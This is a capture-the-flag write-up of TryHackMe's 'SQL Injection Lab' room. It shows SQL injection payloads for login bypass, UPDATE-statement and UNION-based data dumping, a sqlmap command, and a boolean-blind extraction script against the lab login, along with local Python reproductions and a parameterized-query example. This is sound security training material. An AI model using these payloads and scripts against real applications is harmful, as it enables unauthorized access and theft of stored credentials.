SQL INJECTION LAB
By Riteshpuvvada
This is a writeup of the TryHackMe room “SQL Injection Lab”.
INTRODUCTION
Enumeration
Basic Nmap scan
Checking on port 5000
Introduction to SQL injection: Part 1
Input Box Non-String
We have to bypass the login to retrieve the flag for Question 1.
There is no input sanitization here, so a simple injection logs us in. The profileID field is used in a numeric (non-string) context, so any payload that makes the WHERE clause true works. For example, 1 or 1=1-- - (1=1 is always true, and -- - comments out the rest of the query, including the password check).
We bypassed the login with a simple SQL injection.
Input Box String
On this login page the profileID field is used as a string, i.e. the query wraps it in single quotes, so the payload first has to close that quote. The previous payload becomes 1' or '1'='1'-- -
We bypassed the login page.
URL injection
In this challenge we can’t inject directly through the input field because client-side validation has been added.
Viewing the page source, we found the JavaScript responsible.
The script blocks special characters and pops up an alert, but it only runs in the browser; the server still accepts whatever it receives. We can bypass it by sending the payload directly in the URL:
http://10.10.142.137:5000/sesqli3/login?profileID=-1' or 1=1-- -&password=a
The JavaScript validation never sees this request, so the payload reaches the server and we are logged in.
POST injection
This challenge uses HTTP POST, so the payload can’t go in the URL, and the JavaScript still blocks the input field. With Burp Suite we can strip the client-side validation instead.
Under Proxy > Options, Burp’s response modification rules include an option to remove all JavaScript from responses.
With that option enabled the page loads without its validation script, so the payload can simply be typed into the form. (Alternatively, intercept the POST in Burp and edit the body directly; the client-side check has already run by then.)
When we forward the request, the payload reaches the server and is executed.
Introduction to SQL injection: Part 2
SQL injection attack on UPDATE statement
They gave us login credentials:
profileID : 10
Password : toor
In the Edit Profile tab we can update Nickname, E-mail, and Password. Viewing the source code
shows that these fields reach the database, so let’s test with a payload injected into the E-mail field:
asd',nickname='test',email='test
It worked, so the field is vulnerable. Now let’s dig deeper. First we need to identify which database the application uses; the version query differs per engine:
# MySQL and MSSQL
',nickName=@@version,email='
# Oracle
',nickName=(SELECT banner FROM v$version),email='
# SQLite
',nickName=sqlite_version(),email='
The application is using SQLite 3.22.0.
With the group_concat() function we can list all the tables in a single field, which matters here because only one value (the nickname) is shown back to us. The query is
',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
Running the above query shows there are two tables. To view the column names of a table we read its CREATE statement back from sqlite_master:
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='
Found all column names.
In this challenge the flag is hidden in the secrets table. Let’s extract all of its data, starting with the columns:
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
There are three columns; to view the complete data we concatenate them into one group_concat():
',nickName=(SELECT group_concat(id || "," || author || "," || secret) from secrets),email='
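The whole UPDATE-statement chain above can be reproduced offline. The following is an added example, not code from the room or the writeup: it builds a small SQLite database shaped like the challenge (a usertable and a secrets table with a made-up flag), runs a hypothetical vulnerable Edit Profile handler that concatenates both fields into the UPDATE, and feeds it the same payloads as the writeup. The table layouts, the handler’s query and the sample rows are assumptions constructed for the example.

```python
import sqlite3


def setup_db():
    # Constructed sample data shaped like the challenge: a user table and a
    # secrets table holding a made-up flag.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usertable (id INTEGER PRIMARY KEY, profileid INTEGER, "
                 "nickname TEXT, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE secrets (id INTEGER PRIMARY KEY, author TEXT, secret TEXT)")
    conn.execute("INSERT INTO usertable VALUES (1, 10, 'user10', 'user10@example.com', 'toor')")
    conn.executemany("INSERT INTO secrets VALUES (?, ?, ?)",
                     [(1, "admin", "flag{constructed-example}"), (2, "bob", "bob secret")])
    conn.commit()
    return conn


def update_profile(conn, profile_id, nickname, email):
    # Hypothetical vulnerable Edit Profile handler: both fields are concatenated
    # straight into the UPDATE, and the stored nickname is shown back to the user.
    sql = f"UPDATE usertable SET nickname='{nickname}', email='{email}' WHERE profileid={profile_id}"
    conn.execute(sql)
    conn.commit()
    return conn.execute("SELECT nickname FROM usertable WHERE profileid=?",
                        (profile_id,)).fetchone()[0]


def inject_via_email(conn, expression):
    # Same shape as the writeup's payloads: close the email string, add a second
    # nickname assignment whose value is our expression, then re-open email so
    # the application's own closing quote still parses. SQLite keeps the
    # rightmost assignment when a column is set twice, so the expression's
    # result lands in the nickname we get to read back.
    payload = f"',nickName=({expression}),email='"
    return update_profile(conn, 10, "x", payload)


def enumerate_db():
    """Version, table list, secrets schema and a full dump, one UPDATE each."""
    conn = setup_db()
    version = inject_via_email(conn, "sqlite_version()")
    tables = inject_via_email(conn, "SELECT group_concat(tbl_name) FROM sqlite_master "
                                    "WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'")
    schema = inject_via_email(conn, "SELECT sql FROM sqlite_master "
                                    "WHERE type!='meta' AND sql NOT NULL AND name='secrets'")
    # The writeup's payload double-quotes the separator ("," ); SQLite only
    # accepts that as a string literal when its double-quoted-string fallback
    # is compiled in, so single quotes are the portable choice here.
    dump = inject_via_email(conn, "SELECT group_concat(id || ',' || author || ',' || secret) "
                                  "FROM secrets")
    return {"version": version, "tables": tables, "schema": schema, "dump": dump}


if __name__ == "__main__":
    for step, value in enumerate_db().items():
        print(f"{step}: {value}")
```

Each call returns what the profile page would display after the update; the last one yields every row of secrets in a single nickname, which is why group_concat() is the tool of choice when only one field is reflected.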
Vulnerable Startup: Broken Authentication
String concatenation is the most common mistake that leads to SQL injection: without input sanitization the user’s input becomes part of the query text, and the database interprets it as SQL. The following payload bypasses the login: ' OR 1=1-- -
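The login bypasses from Part 1 (numeric versus string context) and the ' OR 1=1-- - bypass here are the same mistake seen from two angles. The following added example, which is not code from the room or the writeup, runs each payload against hypothetical vulnerable login queries over an in-memory SQLite database and then against a parameterized query. The users table, its single row (profileID 10, password toor) and the query shapes are assumptions constructed for the example.

```python
import sqlite3


def setup_db():
    # Constructed sample data: one account, profileID 10, password "toor".
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (profileid INTEGER, password TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES (10, 'toor', 'admin')")
    conn.commit()
    return conn


def login_numeric(conn, profile_id, password):
    # Hypothetical vulnerable query: profileID is concatenated unquoted, so the
    # injected text is parsed as SQL directly (Part 1, "Input Box Non-String").
    sql = f"SELECT name FROM users WHERE profileid={profile_id} AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_string(conn, profile_id, password):
    # Hypothetical vulnerable query: profileID is wrapped in single quotes, so
    # the payload must first close that quote (Part 1, "Input Box String").
    sql = f"SELECT name FROM users WHERE profileid='{profile_id}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, profile_id, password):
    # Hardened form: bound parameters are sent as values, never as SQL text.
    sql = "SELECT name FROM users WHERE profileid=? AND password=?"
    row = conn.execute(sql, (profile_id, password)).fetchone()
    return row[0] if row else None


def bypass_results():
    """Run each payload in each context and report who we end up logged in as."""
    conn = setup_db()
    numeric_payload = "1 or 1=1-- -"
    string_payload = "1' or '1'='1'-- -"
    short_payload = "' OR 1=1-- -"
    return {
        # 1=1 is always true and "-- -" comments out the password check.
        "numeric_ctx": login_numeric(conn, numeric_payload, "wrong"),
        "string_ctx": login_string(conn, string_payload, "wrong"),
        "string_ctx_short": login_string(conn, short_payload, "wrong"),
        # The numeric payload inside quotes is just text compared to the id.
        "string_ctx_wrong_payload": login_string(conn, numeric_payload, "wrong"),
        # Parameterized queries treat every payload as a literal value.
        "safe_numeric": login_safe(conn, numeric_payload, "wrong"),
        "safe_string": login_safe(conn, string_payload, "wrong"),
        "safe_real_creds": login_safe(conn, 10, "toor"),
    }


if __name__ == "__main__":
    for case, who in bypass_results().items():
        print(f"{case:26s} -> {who}")
```

The fourth case is the one that trips people up in Part 1: the numeric payload does nothing in a string context because it never escapes the quotes, which is why the writeup changes the payload rather than the idea.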
Vulnerable Startup: Broken Authentication 2
The application is still vulnerable.
When I logged in there was no flag, so I started inspecting the application and found a session cookie, which I decoded with https://www.kirsle.net/wizards/flask-session.cgi (Flask session cookies are signed, not encrypted, so their contents can be read without the secret key).
It is possible to dump the passwords with a UNION-based SQL injection. First find the number of columns the original query returns by adding NULL placeholders until the query stops erroring:
1' UNION SELECT NULL-- -
1' UNION SELECT NULL, NULL-- -
1' UNION SELECT NULL, NULL, NULL-- -
With the column count known, injecting the following payload into the username field retrieves the hidden flag from the database:
' UNION SELECT 1, group_concat(password) FROM users-- -
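The column-counting and dump steps above, as an added example that is not code from the room or the writeup. It assumes the login query selects two columns (id, username) and displays the username after login, and uses a constructed users table with a made-up flag as the admin password; the column-count probe stops at the first UNION that SQLite accepts.

```python
import sqlite3


def setup_db():
    # Constructed sample data: the users table with a made-up flag as a password.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "flag{constructed-example}"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


def login(conn, username, password):
    # Hypothetical vulnerable login: the matched (id, username) row becomes the
    # session, and username is displayed on the landing page after login.
    sql = f"SELECT id, username FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone()


def count_columns(conn, max_cols=10):
    # UNION requires both SELECTs to have the same column count; keep adding
    # NULL placeholders until the database stops complaining.
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            login(conn, f"1' UNION SELECT {nulls}-- -", "x")
            return n
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the same
            # number of result columns" -> try one more column
            continue
    return None


def dump_passwords(conn):
    # Put group_concat(password) in the column the app displays (the second one);
    # the left-hand SELECT matches nothing, so our row is the one returned.
    row = login(conn, "' UNION SELECT 1, group_concat(password) FROM users-- -", "x")
    return row[1] if row else None


def run():
    conn = setup_db()
    return {"columns": count_columns(conn), "passwords": dump_passwords(conn)}


if __name__ == "__main__":
    print(run())
```

On a real target the error is not always visible; when it is suppressed, the probe still works because a wrong column count yields the ordinary failed-login page while the right one logs you in as the NULL row.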
Vulnerable Startup: Broken Authentication 3 (Blind Injection)
We can solve this challenge in two ways.
- With sqlmap (boolean-based blind technique, SQLite backend):
sqlmap -u http://x.x.x.x:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
- The easier way is the Python script available in the room’s Downloads tab:
#!/usr/bin/python3
import sys
import string
import requests


def send_p(url, query):
    # Inject into the username field; the password value is irrelevant
    # because the payload comments out the rest of the query.
    payload = {"username": query, "password": "admin"}
    try:
        r = requests.post(url, data=payload, timeout=3)
    except requests.exceptions.ConnectTimeout:
        print("[!] ConnectionTimeout: Try to adjust the timeout time")
        sys.exit(1)
    return r.text


def main(addr):
    url = f"http://{addr}/challenge3/login"
    flag = ""
    password_len = 38
    # Not the most efficient way of doing it...
    # Positions are 1-based for SUBSTR, so test 1..password_len inclusive.
    for i in range(1, password_len + 1):
        for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":
            # Convert char to hex and remove "0x"
            h = hex(ord(c))[2:]
            # The login page answers "Invalid" when the condition is false.
            query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \
                    f"{i},1)=CAST(X'{h}' AS TEXT)--"
            resp = send_p(url, query)
            if "Invalid" not in resp:
                flag += c
                print(flag)
                break  # only one character can match at this position
    print(f"[+] FLAG: {flag}")


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")
        sys.exit(0)
    main(sys.argv[1])
Usage: python3 challenge3-exploit.py MACHINE_IP:5000
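The room script tries every candidate character at every position, which costs up to 64 requests per character. As an added example that is not part of the room or the writeup, the following code shows the general boolean-blind algorithm with a binary search over the character code, and first recovers the length with length(), against a constructed local SQLite login that answers "Invalid" when no row matches. The login query, the table contents and the unicode() oracle are assumptions; on the real target the oracle would be a POST like send_p() above with the same "Invalid" check.

```python
import sqlite3

# Same target expression as the room script.
TARGET = "(SELECT password FROM users LIMIT 0,1)"


class BlindExtractor:
    def __init__(self):
        # Constructed sample data: the first row holds the password we want.
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES (1, 'admin', 'flag{constructed-example}')")
        self.conn.commit()
        self.queries = 0  # counts oracle calls so the cost can be compared

    def login_page(self, username, password):
        # Hypothetical vulnerable login: the only signal we get back is whether
        # the page says "Invalid", which is exactly what the room script checks.
        self.queries += 1
        sql = f"SELECT id FROM users WHERE username='{username}' AND password='{password}'"
        return "Welcome" if self.conn.execute(sql).fetchone() else "Invalid username or password"

    def oracle(self, condition):
        # True when the injected condition holds for the real 'admin' row.
        return "Invalid" not in self.login_page(f"admin' AND ({condition})-- -", "x")

    def bisect(self, lo, hi, predicate):
        # Smallest v in [lo, hi] with predicate(v) true, given that predicate is
        # false below some threshold and true from it onwards.
        while lo < hi:
            mid = (lo + hi) // 2
            if predicate(mid):
                hi = mid
            else:
                lo = mid + 1
        return lo

    def find_length(self, max_len=64):
        return self.bisect(0, max_len, lambda n: self.oracle(f"length({TARGET}) <= {n}"))

    def extract_char(self, pos):
        # Printable ASCII range; unicode() gives the code point of the character.
        code = self.bisect(32, 126,
                           lambda c: self.oracle(f"unicode(substr({TARGET},{pos},1)) <= {c}"))
        return chr(code)

    def extract_password(self):
        length = self.find_length()
        return "".join(self.extract_char(i) for i in range(1, length + 1))


def run():
    """Return the recovered password and how many oracle queries it took."""
    ex = BlindExtractor()
    password = ex.extract_password()
    return password, ex.queries


if __name__ == "__main__":
    password, n = run()
    print(f"[+] FLAG: {password} ({n} queries)")
```

Seven queries bound each binary search (65 possible lengths, 95 printable codes), so a 25-character secret costs at most 7 + 25 × 7 = 182 oracle calls instead of up to 64 per character; the same idea is what sqlmap’s boolean-based technique does under the hood.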